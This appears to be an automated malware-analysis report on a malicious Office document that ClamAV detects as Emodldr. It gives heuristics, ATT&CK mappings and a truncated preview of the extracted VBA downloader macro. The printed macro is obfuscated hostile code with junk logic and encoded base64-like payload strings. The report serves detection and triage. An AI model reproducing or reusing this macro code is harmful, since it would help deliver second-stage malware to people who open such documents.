MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro utilizes CreateObject and an AutoOpen function, indicative of malicious intent. ClamAV detection confirms its malicious nature, identifying it as Emodldr. The macro's primary function appears to be downloading and executing a second-stage payload, as suggested by the 'Ingress Tool Transfer' technique.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 47643 bytes |
SHA-256: 2c211702ab634d7e4a22fd106da79c32444cee646d70462195adb346d2b0c8b3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mJWqABWvBqW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zGPBiUl"
Function ncRGrsFSaSdto()
On Error Resume Next
Select Case rWNDu
Case 76781
ifOlh = Hex(7504 - CSng(54711) - 5177 + ChrW(jDmNZ))
DldYcm = AMrkq
End Select
SvDXIIz = RaqSnZ("If.s7bjAGEANABjADMANABkAGMAMQA5ADAAMAA4AGMAOQBmADYAOQBmAGIANAA2ADgAZABlADcAMQAyADIAZQBmAGEAZQBjADEAZQA0ADYAMQA3AGUAMAA0AGEAYwA2XK", 7, 121)
Select Case bwXBcO
Case 77531
hVUAiR = Hex(16939 - CSng(23866) - 11848 + ChrW(VuDSb))
VLNZf = uzNla
End Select
Select Case hzHmGk
Case 3237
VwYWmj = Hex(37229 - CSng(45506) - 74467 + ChrW(IVfOTO))
FsRpi = Gzjpt
End Select
mmMwHnzB = RaqSnZ("j0%jdBjADEAOAA5ADkAMgBlAGQAZAAwAGYAZgAyAGMAOQA2ADAANAAxADYAMgA5czc", 6, 58)
Select Case kGEnwO
Case 98129
tzWoU = Hex(553 - CSng(31015) - 4879 + ChrW(BTfsZB))
kzrwRX = qZfCZ
End Select
Select Case FLDCP
Case 5942
suTJt = Hex(50441 - CSng(18381) - 35843 + ChrW(DIFWH))
iqtNLk = vwjOHH
End Select
WMKqIfMCiCR = RaqSnZ("J4hDkAYgBhADUANAAwADAAMgA3ADEAMgBmAGIANgAxADMAOAAwADIAYwBjAGQAOAAwADAAMAA1ADMAMABlADgAZAAxADcAYgA1AGQAYH74E", 4, 100)
Select Case QJQpM
Case 97239
RSYvms = Hex(60621 - CSng(18452) - 47507 + ChrW(ZwicMJ))
sXOzW = iSCCvt
End Select
Select Case MjdJS
Case 46884
RETJar = Hex(42552 - CSng(11033) - 82377 + ChrW(PjoGMt))
cDqHcP = mnihvq
End Select
aKcfSdppCPA = RaqSnZ("PLSDUAYQA2AGEAZgA0ADgANQBkADgAOQA5AGYAYwAwAGIAOQA2ADQAZgA0AGUAMgAxADYAYQBku%o", 4, 71)
Select Case GjbQX
Case 43154
cWAkEj = Hex(10319 - CSng(6992) - 75811 + ChrW(znzjP))
opofXm = oKAjI
End Select
Select Case HVKdv
Case 37149
UEZww = Hex(61749 - CSng(91365) - 99262 + ChrW(ClBVN))
VwWKE = kiJKB
End Select
uRlBLBff = RaqSnZ(".HANwBjAGIANQA1AGMAMgBlADgAZABjADUANAA3ADAANwAwADAANAAxADYAMABlAGYAMgA5AGIAM34oh4zB", 3, 74)
Select Case zECdk
Case 52113
CaWYk = Hex(11353 - CSng(76000) - 51284 + ChrW(WGviv))
AOGkOr = WPlwXw
End Select
Select Case wCSPK
Case 36606
tQNZro = Hex(77390 - CSng(94309) - 7965 + ChrW(TsdJD))
LVARz = bTfGo
End Select
wzdXDE = RaqSnZ("8K8QAZAA4ADkAOAA0AGMAZQA5ADYANwAxAGQANgA5ADkAZgBmADEAZABjADkAN7z8", 4, 59)
Select Case wjwnY
Case 76759
VlwkQu = Hex(31598 - CSng(86016) - 76100 + ChrW(lNsujH))
JCvcpu = lAawVI
End Select
Select Case uDrdQi
Case 54381
GMLki = Hex(51716 - CSng(6952) - 39998 + ChrW(rIChYF))
zFsoUY = BLLJwF
End Select
tjsRsJsfa = RaqSnZ("HDVotAAZgAyADUAYQBhADAANAA1ADgAYQA4AGMANgBlAGMANQAyADYAMAAxADIANwA4ADYANgAzADUANQA2AGMAZgAxAGUAYQAyAGEAZAA4ADIAMgBmADIAYQBkADYAYgA4AbHlL", 6, 127)
Select Case YZRFf
Case 14089
iVhWIt = Hex(44949 - CSng(96181) - 36600 + ChrW(WzNdL))
nkhXKZ = REPGT
End Select
Select Case zwdZY
Case 89249
NVWzSc = Hex(34954 - CSng(68460) - 69966 + ChrW(qwfUE))
sSWWU = HfWiw
End Select
zYzMj = RaqSnZ("O,r9ljAA0ADkANwA4ADgAZABlADcANgA1ADAANQBlADgAMgBiADcANwAwADgAZgBhADUANQA2ADIANAAwADIAMgBjAGYANQA1AGMAMwAxADAAMwAwADcANwBjADAAMgAyADMAOQBhADcAMwA1AGIANgBjADYAZgA0ADIA5Ga", 7, 159)
Select Case wlhsl
Case 15202
zWPWiT = Hex(49475 - CSng(33248) - 90467 + ChrW(ointnk))
BXSLO = bkdJlz
End Select
Select Case oEcJt
Case 29035
sSAjav = Hex(2745 - CSng(70214) - 29498 + ChrW(Ttpjd))
NuTBcc = IzPow
End Select
pkNYmqz = RaqSnZ("SM@wnHADUAYwAzADcAZABlADMAMABhAGIAZgAxADAAZQA5ADMAMgAyADYAMgAwADMAMQA0ADQAYQBiADAAOQBmADUAYQBkADQAZgBhADUAMABmn
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.